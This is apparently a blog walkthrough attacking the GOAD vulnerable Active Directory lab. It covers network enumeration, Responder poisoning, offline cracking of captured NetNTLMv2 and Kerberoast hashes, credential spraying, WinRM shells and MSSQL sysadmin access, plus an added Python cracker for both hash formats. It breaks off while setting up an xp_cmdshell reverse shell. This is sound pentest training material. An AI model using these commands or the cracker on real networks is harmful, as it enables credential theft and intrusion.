What is GOAD?
GOAD (Game of Active Directory) is a deliberately vulnerable Active Directory lab, together with the tooling that builds it, intended for pentesting practice.
The repository offers several lab variants; this post covers the standard GOAD lab: 5 VMs, 2 forests and 3 domains.
Since five Windows VMs run at the same time, the host needs a fair amount of resources.
I also prepared a Kali Linux VM for the walkthrough.
Here is my machine:
Ubuntu 22.04.5 LTS, 12-core CPU, 64GB RAM
It worked fine in my environment, so I think it will work without any problems if your machine has sufficient specs.
Building GOAD
Building the lab is straightforward: clone the repository and run the two commands below (install, then start).
./goad.sh -t install -l GOAD -p virtualbox -m docker
./goad.sh -t start -l GOAD -p virtualbox -m docker
To stop it, run the following command:
./goad.sh -t stop -l GOAD -p virtualbox -m docker
The setup takes a while, so have a cup of tea while you wait. It depends on your machine's specs, but I personally found it took about 15 minutes for the initial setup and about 5 minutes to start the environment afterwards.
GOAD Walkthrough
Now let's start attacking the GOAD lab.
The goal is Administrator privileges on all five machines.
All machines are deployed on the 192.168.56.0/24 network, so the plan below assumes that address range.
Recon
I could sweep the network with nmap or RustScan, but since we already know there are five Windows machines, let's enumerate them over SMB with netexec (nxc):
┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24
SMB  192.168.56.12  445  MEEREEN       [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB  192.168.56.10  445  KINGSLANDING  [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB  192.168.56.11  445  WINTERFELL    [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB  192.168.56.23  445  BRAAVOS       [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB  192.168.56.22  445  CASTELBLACK   [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
This single command already tells us a lot. In summary:
Five machines, three domains.
- Domain: essos.local
  - meereen.essos.local (Windows Server 2016 Standard Evaluation 14393 x64) (SMBv1:True)
  - braavos.essos.local (Windows Server 2016 Standard Evaluation 14393 x64) (signing:False) (SMBv1:True)
- Domain: north.sevenkingdoms.local
  - castelblack.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64) (signing:False)
  - winterfell.north.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
- Domain: sevenkingdoms.local
  - kingslanding.sevenkingdoms.local (Windows 10 / Server 2019 Build 17763 x64)
Two hosts, BRAAVOS and CASTELBLACK, do not require SMB signing, which is worth remembering for later.
Next, find which server is the domain controller for each domain by querying the _ldap._tcp.dc._msdcs SRV record. 192.168.56.10 answers DNS for all three domains, so point nslookup at it:
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Repeat this for each domain.
┌──(kali㉿kali)-[~]
└─$ nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Server:         192.168.56.10
Address:        192.168.56.10#53

_ldap._tcp.dc._msdcs.sevenkingdoms.local        service = 0 100 389 kingslanding.sevenkingdoms.local.

┌──(kali㉿kali)-[~]
└─$ nslookup -type=srv _ldap._tcp.dc._msdcs.north.sevenkingdoms.local 192.168.56.10
Server:         192.168.56.10
Address:        192.168.56.10#53

Non-authoritative answer:
_ldap._tcp.dc._msdcs.north.sevenkingdoms.local  service = 0 100 389 winterfell.north.sevenkingdoms.local.

Authoritative answers can be found from:
winterfell.north.sevenkingdoms.local    internet address = 192.168.56.11

┌──(kali㉿kali)-[~]
└─$ nslookup -type=srv _ldap._tcp.dc._msdcs.essos.local 192.168.56.10
Server:         192.168.56.10
Address:        192.168.56.10#53

Non-authoritative answer:
_ldap._tcp.dc._msdcs.essos.local        service = 0 100 389 meereen.essos.local.

Authoritative answers can be found from:
meereen.essos.local     internet address = 192.168.56.12
Now that we know the DC for each domain (KINGSLANDING, WINTERFELL and MEEREEN), let's add all the hosts to /etc/hosts:
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# GOAD
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos

::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
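Rather than transcribing the nxc output by hand, a few lines of Python can turn it into the same inventory. The script below is an added example written for this post; it is not part of GOAD or NetExec. It parses the `nxc smb` banner lines shown above (embedded as a constant so it runs offline), groups hosts per domain, emits ready-made /etc/hosts lines, and lists the hosts that do not require SMB signing, the property that makes a host accept relayed NTLM authentication, plus the ones still exposing SMBv1.

```python
"""Parse `nxc smb <range>` output into an inventory.

Added example for this walkthrough; not part of GOAD or NetExec. The sample
input below is the nxc output printed above, embedded so the script runs offline.
"""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List

NXC_OUTPUT = """\
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
"""

# One nxc SMB banner line: protocol, ip, port, NetBIOS name, then the parenthesised fields.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+\S+\s+\[\*\]\s+(?P<os>.+?)\s+"
    r"\(name:(?P<name>[^)]+)\)\s+\(domain:(?P<domain>[^)]+)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)


def parse_nxc_smb(text: str) -> List[dict]:
    """Return one dict per host, sorted by IP; non-matching lines (progress bar, errors) are skipped."""
    hosts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        g = m.groupdict()
        hosts.append({
            "ip": g["ip"],
            "name": g["name"].lower(),
            "domain": g["domain"].lower(),
            "fqdn": f"{g['name'].lower()}.{g['domain'].lower()}",
            "os": g["os"],
            "signing": g["signing"] == "True",
            "smbv1": g["smbv1"] == "True",
        })
    return sorted(hosts, key=lambda h: ipaddress.ip_address(h["ip"]))


def by_domain(hosts: List[dict]) -> Dict[str, List[str]]:
    """domain -> FQDNs, the same grouping as the summary list above."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for h in hosts:
        groups[h["domain"]].append(h["fqdn"])
    return dict(groups)


def hosts_file_lines(hosts: List[dict]) -> List[str]:
    """Lines for /etc/hosts: IP, FQDN and short name per host."""
    return [f"{h['ip']}\t{h['fqdn']} {h['name']}" for h in hosts]


def relay_candidates(hosts: List[dict]) -> List[str]:
    """Hosts that do not require SMB signing accept relayed NTLM authentication."""
    return [h["ip"] for h in hosts if not h["signing"]]


def legacy_smbv1(hosts: List[dict]) -> List[str]:
    """Hosts still exposing SMBv1."""
    return [h["ip"] for h in hosts if h["smbv1"]]


if __name__ == "__main__":
    inv = parse_nxc_smb(NXC_OUTPUT)
    for dom, names in sorted(by_domain(inv).items()):
        print(f"{dom}: {', '.join(names)}")
    print("\n".join(hosts_file_lines(inv)))
    print("no SMB signing:", relay_candidates(inv))
    print("SMBv1 enabled: ", legacy_smbv1(inv))
```

Pipe the real nxc output in instead of the constant (`nxc smb 192.168.56.0/24 | python3 inventory.py` after swapping `NXC_OUTPUT` for `sys.stdin.read()`), and the hosts-file block is ready to paste; the DC lookup still needs the SRV queries above, since the SMB banner does not say which host is a DC.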
Responder
Now let's see whether we can capture any authentication material with Responder, listening on the lab interface (eth1):
┌──(kali㉿kali)-[~]
└─$ sudo responder -I eth1

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth1]
    Responder IP               [192.168.56.104]
    Responder IPv6             [fe80::5af0:79:dd52:80d1]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-YPREFKD6ZBU]
    Responder Domain Name      [NMYV.LOCAL]
    Responder DCE-RPC Port     [48610]

[+] Listening for events...
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Bravos
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Bravos
[SMB] NTLMv2-SSP Client   : fe80::65bb:b7ff:1ad1:140
[SMB] NTLMv2-SSP Username : NORTH\robb.stark
[SMB] NTLMv2-SSP Hash     : robb.stark::NORTH:d186ef4b2d5f70e9:0E29C7FA08D6D94EA56390D123A5A422:
[...]
[*] Skipping previously captured hash for NORTH\robb.stark
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::65bb:b7ff:1ad1:140 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[SMB] NTLMv2-SSP Client   : fe80::65bb:b7ff:1ad1:140
[SMB] NTLMv2-SSP Username : NORTH\eddard.stark
[SMB] NTLMv2-SSP Hash     : eddard.stark::NORTH:7acc26627de9f50b:8B925C1E0C815B42E9D34D1830847365:
[...]
[*] Skipping previously captured hash for NORTH\eddard.stark
[...]
[*] Skipping previously captured hash for NORTH\robb.stark
[+] Exiting...
Responder immediately captured two NetNTLMv2 challenge-responses, for NORTH\robb.stark and NORTH\eddard.stark. Both requests come from 192.168.56.11 (WINTERFELL), which keeps looking up the misspelled hosts Bravos and Meren: those names do not resolve in DNS, so the client falls back to LLMNR, NBT-NS and mDNS, which is exactly what Responder poisons. Note that what we have are challenge-responses, not NT hashes: they can be cracked offline but cannot be used for pass-the-hash.
Let's crack robb.stark's response with john (it auto-detects the netntlmv2 format):
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sexywolfy        (robb.stark)
6g 0:00:00:14 DONE (2024-10-06 15:40) 0.4276g/s 1022Kp/s 3622Kc/s 3622KC/s !)(OPPQR..*7¡Vamos!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
That gives us the credentials robb.stark / sexywolfy.
Let's use NetExec to see how far these credentials reach.
First, SMB:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc smb 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
SMB  192.168.56.12  445  MEEREEN       [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB  192.168.56.11  445  WINTERFELL    [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB  192.168.56.10  445  KINGSLANDING  [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB  192.168.56.12  445  MEEREEN       [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE
SMB  192.168.56.23  445  BRAAVOS       [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB  192.168.56.22  445  CASTELBLACK   [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB  192.168.56.11  445  WINTERFELL    [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB  192.168.56.10  445  KINGSLANDING  [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE
SMB  192.168.56.23  445  BRAAVOS       [+] essos.local\robb.stark:sexywolfy
SMB  192.168.56.22  445  CASTELBLACK   [+] north.sevenkingdoms.local\robb.stark:sexywolfy
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
robb.stark is accepted on WINTERFELL with (Pwn3d!), which means the account has administrative rights on the north DC, and as an ordinary user on CASTELBLACK. The [+] on BRAAVOS without Pwn3d! is not a real domain logon: nxc tried the account as essos.local\robb.stark, which does not exist in essos, and BRAAVOS evidently maps unknown users to its enabled Guest account (the MSSQL check further down fails for exactly that reason, as 'BRAAVOS\Guest'). MEEREEN, the essos DC, rejects the same attempt outright.
Next, WinRM:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc winrm 192.168.56.10-23 -u 'robb.stark' -p 'sexywolfy'
WINRM  192.168.56.11  5985  WINTERFELL    [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local)
WINRM  192.168.56.10  5985  KINGSLANDING  [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local)
WINRM  192.168.56.12  5985  MEEREEN       [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local)
WINRM  192.168.56.22  5985  CASTELBLACK   [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
WINRM  192.168.56.11  5985  WINTERFELL    [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
WINRM  192.168.56.23  5985  BRAAVOS       [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
WINRM  192.168.56.23  5985  BRAAVOS       [-] essos.local\robb.stark:sexywolfy
WINRM  192.168.56.12  5985  MEEREEN       [-] essos.local\robb.stark:sexywolfy
WINRM  192.168.56.22  5985  CASTELBLACK   [-] north.sevenkingdoms.local\robb.stark:sexywolfy
WINRM  192.168.56.10  5985  KINGSLANDING  [-] sevenkingdoms.local\robb.stark:sexywolfy
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Winterfell Walkthrough (User Permissions)
robb.stark can log in to WINTERFELL over WinRM, so let's get a shell with evil-winrm:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ evil-winrm -u robb.stark -p sexywolfy -i winterfell.north.sevenkingdoms.local

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robb.stark\Documents>
We're in. Since WINTERFELL is the domain controller, net user lists the domain accounts:
*Evil-WinRM* PS C:\Users\robb.stark\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            arya.stark               brandon.stark
catelyn.stark            eddard.stark             Guest
hodor                    jeor.mormont             jon.snow
krbtgt                   rickon.stark             robb.stark
samwell.tarly            sansa.stark              sql_svc
vagrant
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\robb.stark\Documents>
I saved the results to users.txt:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ cat users.txt
Administrator
arya.stark
brandon.stark
catelyn.stark
eddard.stark
Guest
hodor
jeor.mormont
jon.snow
krbtgt
rickon.stark
robb.stark
samwell.tarly
sansa.stark
sql_svc
Let's check whether Kerberoasting is possible, i.e. whether any user accounts have SPNs registered, and request their service tickets. (The -k flag asks impacket to use a Kerberos ccache; there is none, so it falls back to the supplied password, hence the "CCache file is not found" lines.)
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-GetUserSPNs -dc-ip winterfell north.sevenkingdoms.local/"robb.stark":"sexywolfy" -request -k
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting machinename
[-] CCache file is not found. Skipping...
ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Delegation
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  -------------
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2024-08-10 23:42:13.018886  <never>                     unconstrained
CIFS/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2024-08-10 23:42:20.300231  <never>                     constrained
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2024-08-10 23:42:20.300231  <never>                     constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2024-08-10 23:42:25.706411  2024-10-06 15:29:36.777610
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2024-08-10 23:42:25.706411  2024-10-06 15:29:36.777610

[-] CCache file is not found. Skipping...
$krb5tgs$23$*sansa.stark$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sansa.stark*$bf87ed85f509050cb9c4bc9bc1ebc4b3$
$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$1e15ebd4698ad759a436a2f71a909132$
$krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$f2afc954ac537ec194d071e3bd454869$650
Three accounts are roastable: sansa.stark (unconstrained delegation), jon.snow (constrained delegation) and sql_svc (the MSSQL service on CASTELBLACK). All three tickets came back as $krb5tgs$23$, i.e. RC4-HMAC, the cheapest etype to crack.
Let's try cracking jon.snow's ticket, the user configured for constrained delegation:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ john --format=krb5tgs jon.snow.krb5tgts --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iknownothing     (?)
1g 0:00:00:02 DONE (2024-10-06 16:09) 0.3378g/s 2511Kp/s 2511Kc/s 2511KC/s ikulet..ikkezelf85
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
That gives us a second credential: jon.snow / iknownothing.
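Before moving on, here is what john actually does in the two cracking steps above, the NetNTLMv2 response Responder captured for robb.stark and the Kerberoast ticket for jon.snow, written out as a worked example. This is added code for this post, not code from the original walkthrough, GOAD, Responder or john. Both formats are keyed by the same secret, the NT hash MD4(UTF-16LE(password)), and a wordlist attack simply recomputes each format from every candidate and compares. The usernames, realm and the server challenge d186ef4b2d5f70e9 come from the output above; the NTLMv2 blob, the ticket confounder and the ticket body are constructed, so the NTProofStr and checksum values in the samples differ from the ones printed above. `ntproof_from_nt` takes the NT hash rather than the password, which is the mechanism behind pass-the-hash: whoever holds the NT hash can answer the challenge without knowing the password.

```python
"""Offline checks for the two crackable formats captured in this walkthrough.
Added example, not code from the original post, GOAD, Responder or john. Both formats
are keyed by NT hash = MD4(UTF-16LE(password)) but neither contains that hash."""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks md4 on OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:    # round 1: F = (x AND y) OR (NOT x AND z), X[0..15] in order
                f, k, s, K = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:  # round 2: G = majority, X taken column-wise (0,4,8,12,1,...)
                j = i - 16
                f, k, s, K = (b & c) | (b & d) | (c & d), (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:         # round 3: H = xor, fixed permutation of X
                j = i - 32
                f, k, s, K = b ^ c ^ d, order3[j], (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a, b, c, d = d, rot((a + f + X[k] + K) & M32, s), b, c
        h = [(x + y) & M32 for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for ch in data:                            # keystream XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(ch ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def hmd5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def ntproof_from_nt(nt: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 needs only the NT hash, not the password: that is why pass-the-hash works."""
    v2 = hmd5(nt, (user.upper() + domain).encode("utf-16-le"))  # user upper-cased, domain as sent
    return hmd5(v2, challenge + blob)                            # NTProofStr


def crack_netntlmv2(line: str, candidates: Iterable[str]) -> Optional[str]:
    # Responder/john layout: user::DOMAIN:server_challenge:NTProofStr:blob
    user, _, domain, chal, proof, blob = line.split(":", 5)
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for pw in candidates:
        if hmac.compare_digest(ntproof_from_nt(nt_hash(pw), user, domain, chal, blob), proof):
            return pw
    return None


def krb5tgs_matches(nt: bytes, cksum: bytes, edata: bytes) -> bool:
    """RC4-HMAC (RFC 4757), key usage 2: K1 = HMAC(NT, usage); K3 = HMAC(K1, cksum); verify HMAC(K1, RC4(K3, edata))."""
    k1 = hmd5(nt, b"\x02\x00\x00\x00")
    plain = rc4(hmd5(k1, cksum), edata)
    return hmac.compare_digest(hmd5(k1, plain), cksum)


def crack_krb5tgs(line: str, candidates: Iterable[str]) -> Optional[str]:
    # john layout: $krb5tgs$23$*user$REALM$spn*$checksum$edata
    _, _, etype, rest = line.split("$", 3)
    assert etype == "23", "only RC4-HMAC tickets are keyed directly by the NT hash"
    _, cksum, edata = rest.rsplit("$", 2)
    cksum, edata = bytes.fromhex(cksum), bytes.fromhex(edata)
    for pw in candidates:
        if krb5tgs_matches(nt_hash(pw), cksum, edata):
            return pw
    return None


# Constructed samples: challenge, user and realm are the ones printed above; blob, confounder
# and ticket body are made up, so NTProofStr and checksum differ from the post's values.
def sample_netntlmv2() -> str:
    chal = bytes.fromhex("d186ef4b2d5f70e9")
    blob = (bytes.fromhex("0101000000000000") + struct.pack("<Q", 0x01DAE55ED3D4A2C0)  # header, timestamp
            + bytes.fromhex("0011223344556677") + b"\x00" * 4                            # client nonce, reserved
            + b"\x02\x00" + struct.pack("<H", 10) + "NORTH".encode("utf-16-le")         # MsvAvNbDomainName
            + b"\x00" * 8)                                                               # MsvAvEOL, reserved
    proof = ntproof_from_nt(nt_hash("sexywolfy"), "robb.stark", "NORTH", chal, blob)
    return f"robb.stark::NORTH:{chal.hex()}:{proof.hex()}:{blob.hex()}"


def sample_krb5tgs() -> str:
    k1 = hmd5(nt_hash("iknownothing"), b"\x02\x00\x00\x00")
    data = bytes.fromhex("0f1e2d3c4b5a6978") + b"\x63\x82\x01\x00constructed EncTicketPart body"  # confounder + body
    cksum = hmd5(k1, data)
    return ("$krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$"
            f"{cksum.hex()}${rc4(hmd5(k1, cksum), data).hex()}")
```

Calling `crack_netntlmv2(sample_netntlmv2(), wordlist)` and `crack_krb5tgs(sample_krb5tgs(), wordlist)` with a wordlist containing the two GOAD passwords returns sexywolfy and iknownothing respectively. Two details matter in practice: the NTLMv2 hash mixes in the upper-cased username and the domain exactly as the client sent it, so a capture cannot be checked against a wordlist without those two fields, while an RC4 Kerberos ticket is keyed by the bare NT hash and nothing else, which is one reason RC4 (etype 23) tickets are the preferred Kerberoast target.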
CASTELBLACK Exploit (From MSSQL to Administrator)
jon.snow can authenticate to the MSSQL instance on CASTELBLACK:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc mssql 192.168.56.10-12 192.168.56.22-23 -u jon.snow -p 'iknownothing'
MSSQL  192.168.56.22  1433  CASTELBLACK  [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL  192.168.56.22  1433  CASTELBLACK  [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!)
MSSQL  192.168.56.23  1433  BRAAVOS      [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local)
MSSQL  192.168.56.23  1433  BRAAVOS      [-] essos.local\jon.snow:iknownothing (Login failed for user 'BRAAVOS\Guest'. Please try again with or without '--local-auth')
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Let's connect to MSSQL with Windows authentication:
$ impacket-mssqlclient north.sevenkingdoms.local/jon.snow:iknownothing@castelblack -windows-auth
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (NORTH\jon.snow  dbo@master)>
Let's see which logins hold the sysadmin role on this instance:
SQL (NORTH\jon.snow  dbo@master)> select loginname from syslogins where sysadmin = '1'
loginname
---------------------------
sa
NORTH\sql_svc
NT SERVICE\SQLWriter
NT SERVICE\Winmgmt
NT SERVICE\MSSQL$SQLEXPRESS
CASTELBLACK\vagrant
NORTH\jon.snow
jon.snow is a sysadmin, so we can enable xp_cmdshell and run operating-system commands in the context of the SQL Server service account.
Enable xp_cmdshell and launch a reverse shell (you can generate a reverse-shell one-liner at https://www.revshells.com/).
First, note the attacker's IP on the lab interface (eth1, 192.168.56.104) and start a netcat listener:
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
